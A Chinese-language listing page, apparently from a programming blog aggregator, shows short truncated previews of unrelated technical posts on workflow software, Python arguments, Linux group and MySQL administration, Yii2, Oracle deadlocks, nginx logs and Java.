    Fire Workflow 是国内另外一款开源工作流,作者是著名的非也同志,哈哈.... 官方网站是 http://www.fireflow.org 经过大家努力,Fire Workflow 1.0正式版终于发布了 正式版主要变化: 1、增加IWorkItem.jumpToEx(...)方法,取消了当前环节和目标环节必须在同一条执行线的限制,使得自由流更加自由 2、增加IT
  • Python向脚本传参 daizj python脚本传参
    如果想对python脚本传参数,python中对应的argc, argv(c语言的命令行参数)是什么呢? 需要模块:sys 参数个数:len(sys.argv) 脚本名:    sys.argv[0] 参数1:     sys.argv[1] 参数2:     sys.argv[
  • 管理用户分组的命令gpasswd dongwei_6688 passwd
    NAME: gpasswd - administer the /etc/group file SYNOPSIS: gpasswd group gpasswd -a user group gpasswd -d user group gpasswd -R group gpasswd -r group gpasswd [-A user,...] [-M user,...] g
  • 郝斌老师数据结构课程笔记 dcj3sjt126com 数据结构与算法
    <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  • yii2 cgridview加上选择框进行操作 dcj3sjt126com GridView
    页面代码 <?=Html::beginForm(['controller/bulk'],'post');?> <?=Html::dropDownList('action','',[''=>'Mark selected as: ','c'=>'Confirmed','nc'=>'No Confirmed'],['class'=>'dropdown',])
  • linux mysql fypop linux
    enquiry mysql version in centos linux yum list installed | grep mysql yum -y remove mysql-libs.x86_64 enquiry mysql version in yum repositoryyum list | grep mysql oryum -y list mysql* install mysq
  • Scramble String hcx2013 String
    Given a string s1, we may represent it as a binary tree by partitioning it to two non-empty substrings recursively. Below is one possible representation of s1 = "great":
  • 跟我学Shiro目录贴 jinnianshilongnian 跟我学shiro
    历经三个月左右时间,《跟我学Shiro》系列教程已经完结,暂时没有需要补充的内容,因此生成PDF版供大家下载。最近项目比较紧,没有时间解答一些疑问,暂时无法回复一些问题,很抱歉,不过可以加群(334194438/348194195)一起讨论问题。     ----广告-----------------------------------------------------
  • nginx日志切割并使用flume-ng收集日志 liyonghui160com
         nginx的日志文件没有rotate功能。如果你不处理,日志文件将变得越来越大,还好我们可以写一个nginx日志切割脚本来自动切割日志文件。第一步就是重命名日志文件,不用担心重命名后nginx找不到日志文件而丢失日志。在你未重新打开原名字的日志文件前,nginx还是会向你重命名的文件写日志,linux是靠文件描述符而不是文件名定位文件。第二步向nginx主
  • Oracle死锁解决方法 pda158 oracle
     select p.spid,c.object_name,b.session_id,b.oracle_username,b.os_user_name from v$process p,v$session a, v$locked_object b,all_objects c where p.addr=a.paddr and a.process=b.process and c.object_id=b.
  • java之List排序 shiguanghui list排序
       在Java Collection Framework中定义的List实现有Vector,ArrayList和LinkedList。这些集合提供了对对象组的索引访问。他们提供了元素的添加与删除支持。然而,它们并没有内置的元素排序支持。   你能够使用java.util.Collections类中的sort()方法对List元素进行排序。你既可以给方法传递
  • servlet单例多线程 utopialxw 单例多线程servlet
    转自http://www.cnblogs.com/yjhrem/articles/3160864.html 和   http://blog.chinaunix.net/uid-7374279-id-3687149.html Servlet 单例多线程 Servlet如何处理多个请求访问?Servlet容器默认是采用单实例多线程的方式处理多个请求的:1.当web服务器启动的
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他